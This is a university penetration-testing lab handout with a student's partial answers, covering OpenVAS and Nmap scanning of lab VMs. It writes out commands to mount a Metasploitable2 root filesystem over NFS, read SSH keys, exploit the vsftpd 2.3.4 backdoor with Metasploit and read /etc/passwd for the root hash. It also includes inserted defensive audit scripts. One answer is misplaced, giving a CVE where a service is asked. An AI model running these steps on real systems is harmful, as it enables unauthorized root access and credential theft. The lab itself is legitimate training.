Lab 3 - Vulnerability Scanning and Exploitation

School: University of Cincinnati, Main Campus
Course: 4076
Subject: Information Systems
Date: Apr 3, 2024
Pages: 10
Uploaded by DoctorFlagCamel35
IT 4076C – Penetration Testing
Name: __Johnny Makris________
Lab 3 – Vulnerability Scanning and Exploitation

Warning: Any use of penetration testing techniques on a live network could result in expulsion and/or criminal prosecution. Techniques are to be used in lab environments, for educational use only, or on networks for which you have explicit permission to test their defenses.

Introduction: In this lab we will explore methods of vulnerability scanning and exploitation using tools such as OpenVAS and Metasploit. Follow the steps below and answer all questions in your own words with as much detail as possible. Paste screen shots where requested. Upload this entire document to Blackboard. Include your username in the filename.

Virtual Environment Needed:
  Kali Linux (u: root, p: toor)
  Metasploitable2
  Windows XP (SP2)
  Ubuntu 12.04
All on the same network. (If using your own equipment, do not use a bridged connection. This will place the system directly on the network your workstation is attached to.) If you are using the Sandbox, shut down all other systems.

Part 1: Vulnerability Scanning with OpenVAS

Install OpenVAS on your Kali Linux system. This guide (https://www.kali.org/penetration-testing/openvas-vulnerability-scanning/) will help you through the steps. After install, log into the web interface as admin. The password is auto-generated at the end of the install process. Note: You may want to change this to make it easier to remember.
Create a New Target called ScanNetwork with the following settings:
  Manual IP: 192.168.2.0/24 (or the network address of your network)
  Exclude Hosts: <IP address of your Kali system>
  Port List: OpenVAS Default
  Alive Test: Scan Config Default

Create a New Scan Task called DefaultScan with the following settings:
  Scan Targets: ScanNetwork
  Schedule: select the Once checkbox
  Add Results to Assets: Yes
  Leave all other defaults

Run the scan you just created (this will take several minutes to complete). Once completed, go to Scans > Results to view an overview of what the scan detected.

1. Paste a screen shot of this page. (2)
Create a Filtered Report of the results and download it as a PDF file. Review the report and answer the following questions:

2. Which of your systems had the most vulnerabilities? (2)
Windows XP and Ubuntu have the most vulnerabilities.

3. Which port on the Windows XP system showed vulnerabilities? (2)
Port 445

4. What CVE IDs are associated with the top vulnerability on your XP system? (2)
CVE-2006-3439

5. What is the potential impact of this vulnerability being exploited? (2)
A potential impact of this vulnerability is that it can allow code execution with an RPC request and then complete control of the system.

6. Look at the top 2 vulnerabilities on the Metasploitable system. Describe how the scan detected these vulnerabilities. (2)
The scan found the OS with many NVTs, reported the data to identify the OS that matched best, and added data to help with OS detection. TWiki was discovered as a result of the %URLPARAM{}% variable, which allows cross-site scripting attacks to be conducted by attackers due to improper sanitization.

Part 2: Vulnerability Detection with Nmap NSE

In this section, we will use prebuilt Nmap NSE scripts to try to discover potential vulnerabilities within our Metasploitable2 system. A list of all built-in scripts can be found at https://nmap.org/nsedoc/.

Determine the IP address of your Metasploitable2 system and record it here:

Run a service detection scan to determine the open ports and service info:
  nmap -sV <IP of system>

7. Paste a screen shot of the output. (2)

Notice that Apache (httpd), Samba (smb), and NFS are services that are running on this system. Let's explore these.

Find which directories are accessible from NFS:
  nmap --script nfs-ls <IP of system>

8. Paste a screen shot of the output. (2)
Enumerate which users can access Samba shares:
  nmap --script smb-enum-users <IP of system>

9. Paste a screenshot of the top of the script results. (2)
10. Which user accounts are enabled for Samba? (2)
The user accounts that are enabled for Samba are msfadmin and user.

Enumerate directories within HTTP services:
  nmap --script http-enum <IP of system>

11. List any directories that you think might contain any potential vulnerabilities. (2)
/manager/html/upload
/manager/html

Try out some more scripts on your own. Find 2 that reveal some vulnerability information.

12. Paste screen shots and descriptions of the two scripts below. (5)
The banner script connects to any open TCP port and essentially prints out anything that is sent by the listening service.

Part 3: Exploiting Vulnerabilities

In this section we will look at some examples of exploiting known vulnerabilities. Keep in mind, these are very simple examples that should be patched on most systems. DO NOT attempt to run these or any exploits on a system you are not authorized to do so on.

Above we discovered NFS directories that were available. Now we will attempt to mount the root of the system to access these directories:

First install the NFS client:
  apt-get install nfs-common

Check to see which directories are mountable:
  nmap --script nfs-showmount <IP of system>

Info: It appears the root (/) is mountable, so now mount it to your Kali system:
  mkdir /tmp/nfs
  mount -o nolock -t nfs <IP of system>:/ /tmp/nfs

Now you can navigate and read the files on the Metasploitable system within /tmp/nfs. Run a directory listing on the /tmp/nfs directory.

13. Paste a screen shot of the directory. (2)

Now let's see what we can access. Navigate to the msfadmin user's home directory and find the hidden .ssh directory:
  cd /tmp/nfs/home/msfadmin/.ssh

Open the authorized_keys file.

14. Paste a screen shot of the file contents. (2)

Info: You just found the admin user's SSH key (authorized_keys holds the public keys accepted for logins to that account).
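The mount above works only because of how the server's /etc/exports is written. The following audit script is an added example for this write-up, not part of the lab handout or the student's answers; the exports contents it checks are constructed samples, not copied from the lab VM. It parses exports(5) lines and flags the three settings that make the Part 3 mount possible: exporting / itself, exporting to every host, and no_root_squash. It also catches the documented exports(5) trap where a space before the parenthesis detaches the options from the host, so they apply to everyone.

```python
import re

# Constructed /etc/exports contents (not copied from the lab VM).
# WEAK_EXPORTS has the shape of configuration that lets any host mount /;
# HARDENED_EXPORTS is the corrected form of the same share.
WEAK_EXPORTS = """\
# export the whole filesystem to every host, and let remote root stay root
/            *(rw,sync,no_root_squash,no_subtree_check)
/home/share  192.168.2.0/24(ro,sync,root_squash,no_subtree_check)
"""

HARDENED_EXPORTS = """\
/home/share  192.168.2.0/24(ro,sync,root_squash,no_subtree_check)
"""

# exports(5) trap: the space before "(rw)" detaches the options from the host,
# so 192.168.2.15 gets the defaults and "(rw)" applies to every host.
SPACE_TRAP = "/srv/data  192.168.2.15 (rw)\n"

# One client token: "host(opt,opt)", "host" (defaults) or "(opt,opt)" (no host).
CLIENT_TOKEN = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Parse exports(5) lines into [(path, [(client, {options}), ...]), ...]."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        rest = parts[1] if len(parts) > 1 else ""
        clients = []
        for token in rest.split():
            m = CLIENT_TOKEN.match(token)
            client, opts = m.group(1), m.group(2)
            options = {o.strip() for o in opts.split(",")} if opts else set()
            clients.append((client, options))
        entries.append((path, clients))
    return entries


def _finding(path, client, severity, issue):
    return {"path": path, "client": client, "severity": severity, "issue": issue}


def audit_exports(text):
    """Flag the export settings that make a remote mount of / possible."""
    findings = []
    for path, clients in parse_exports(text):
        for client, options in clients:
            world = client in ("", "*")
            reason = ("explicit '*'" if client == "*"
                      else "options with no host (space before the parenthesis)")
            shown = "*" if world else client
            if path == "/":
                findings.append(_finding(path, shown, "critical",
                                         "root filesystem exported; every file, "
                                         "including ~/.ssh, is readable over NFS"))
            if world:
                findings.append(_finding(path, shown, "high",
                                         f"exported to every host ({reason})"))
            if "no_root_squash" in options:
                findings.append(_finding(path, shown, "high",
                                         "no_root_squash: a remote root user "
                                         "keeps uid 0 on this export"))
            if "insecure" in options:
                findings.append(_finding(path, shown, "medium",
                                         "insecure: accepts requests from "
                                         "unprivileged client ports"))
    return findings


if __name__ == "__main__":
    for label, sample in (("weak", WEAK_EXPORTS), ("hardened", HARDENED_EXPORTS),
                          ("space trap", SPACE_TRAP)):
        print(f"== {label} ==")
        for f in audit_exports(sample) or [None]:
            print("  clean" if f is None else
                  f"  {f['severity']:<8} {f['path']} -> {f['client']}: {f['issue']}")
```

Run it against a real file with `audit_exports(open("/etc/exports").read())`. The hardened sample shows the fix the lab implies: export one directory, to one subnet, read-only, with root_squash left in place.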
Using the Metasploit Framework to run an exploit

In our port scans, we discovered that vsftpd version 2.3.4 was running. This version of the service had a well-known backdoor that was installed by a malicious developer. We can use a Metasploit module to exploit this vulnerability.

Start your msfconsole and select the module to run the exploit:
  use exploit/unix/ftp/vsftpd_234_backdoor

Set the target to your Metasploitable system:
  set RHOST <IP of system>
  show targets
  set TARGET 0

Verify the options and exploit:
  show options
  exploit

This opens a telnet session as the root user. Run a few commands to test it out:
  whoami
  hostname
  grep root /etc/passwd

15. Paste a screen shot of these commands. (2)
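Question 6 asks how the scanner detected its findings, and the vsftpd step above shows the answer in miniature: the `nmap -sV` banner from Part 2 ("vsftpd 2.3.4") is matched against a rule that knows that build is backdoored. The script below is an added example written for this write-up, not part of the lab handout, the student's answers, or any scanner's code. It parses a constructed `nmap -sV` listing (only the vsftpd 2.3.4 line comes from the lab; the other version strings are illustrative), applies a small hand-written rule table that stands in for a scanner's NVT database, and flags banners that carry no exact version, which is the case where banner matching cannot decide and a manual check is needed.

```python
import re

# Constructed sample of `nmap -sV` output for a lab host. The vsftpd 2.3.4
# line is the version the lab handout names; every other version string is
# illustrative only and not taken from the lab screenshots.
SAMPLE_NMAP_SV = """\
Nmap scan report for 192.168.2.20
Host is up (0.00042s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open  nfs         2-4 (RPC #100003)
Service Info: OS: Unix
"""

# One port row of normal nmap output: "21/tcp   open  ftp   vsftpd 2.3.4"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Hypothetical rule table standing in for a scanner's plugin database.
# A rule names a service and, optionally, a version pattern; version=None
# means the rule fires whenever the service is exposed at all.
KNOWN_ISSUES = [
    {
        "service": "ftp",
        "version": re.compile(r"\bvsftpd 2\.3\.4\b"),
        "severity": "critical",
        "finding": "vsftpd 2.3.4 backdoored build "
                   "(Metasploit module exploit/unix/ftp/vsftpd_234_backdoor)",
    },
    {
        "service": "nfs",
        "version": None,
        "severity": "high",
        "finding": "NFS reachable from the scanning network; "
                   "check /etc/exports does not export /",
    },
]


def parse_nmap_sv(text):
    """Turn the PORT/STATE/SERVICE/VERSION table into a list of dicts."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue  # report banner, "Not shown:", "Service Info:", header row
        port, proto, state, name, version = m.groups()
        services.append({"port": int(port), "proto": proto, "state": state,
                         "service": name, "version": version.strip()})
    return services


def version_is_precise(version):
    """True when the banner carries an exact dotted version such as '2.3.4'.
    Ranges such as 'Samba smbd 3.X - 4.X' or 'nfs 2-4' cannot be compared
    against a version rule and need a manual check instead."""
    if re.search(r"\d\.X\b", version):   # nmap's "3.X - 4.X" range notation
        return False
    return re.search(r"\d+\.\d+", version) is not None


def assess(services, rules=KNOWN_ISSUES):
    """Apply the rule table to parsed services the way a banner-based scanner
    does, and mark imprecise banners as needing manual review."""
    findings = []
    for svc in services:
        if svc["state"] != "open":
            continue
        for rule in rules:
            if rule["service"] != svc["service"]:
                continue
            if rule["version"] is None or rule["version"].search(svc["version"]):
                findings.append({"port": svc["port"], "service": svc["service"],
                                 "severity": rule["severity"],
                                 "finding": rule["finding"]})
        if not version_is_precise(svc["version"]):
            findings.append({"port": svc["port"], "service": svc["service"],
                             "severity": "info",
                             "finding": "banner has no exact version "
                                        f"({svc['version']!r}); verify manually"})
    return sorted(findings, key=lambda f: f["port"])


if __name__ == "__main__":
    for f in assess(parse_nmap_sv(SAMPLE_NMAP_SV)):
        print(f"{f['port']:>5}/{f['service']:<12} {f['severity']:<8} {f['finding']}")
```

Two things the output makes visible that a scanner report hides: a banner match is a claim about what the service says it is, not proof it is exploitable (a patched build can keep an old version string, and a honeypot can advertise any banner), and the Samba and NFS rows carry no exact version, so no version rule can fire on them, which is why scanners fall back to protocol-level probes such as the smb-enum-users and nfs-showmount scripts used in Part 2.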
Info: The last command gave you the password hash for the root user. This could come in handy later.

Find another exploitable payload that will run against Metasploitable2. (There are tons of guides available on the Internet.)

16. Provide screen shots of running the exploit. Then answer the following questions. (5)

17. What service did this exploit use? (2)
2008-4250

18. What is the CVE ID and/or description of the vulnerability that it took advantage of? (2)

Navigate through the Windows XP directory and see the following sysinfo.
19. What were you able to access after successfully running the exploit? (2)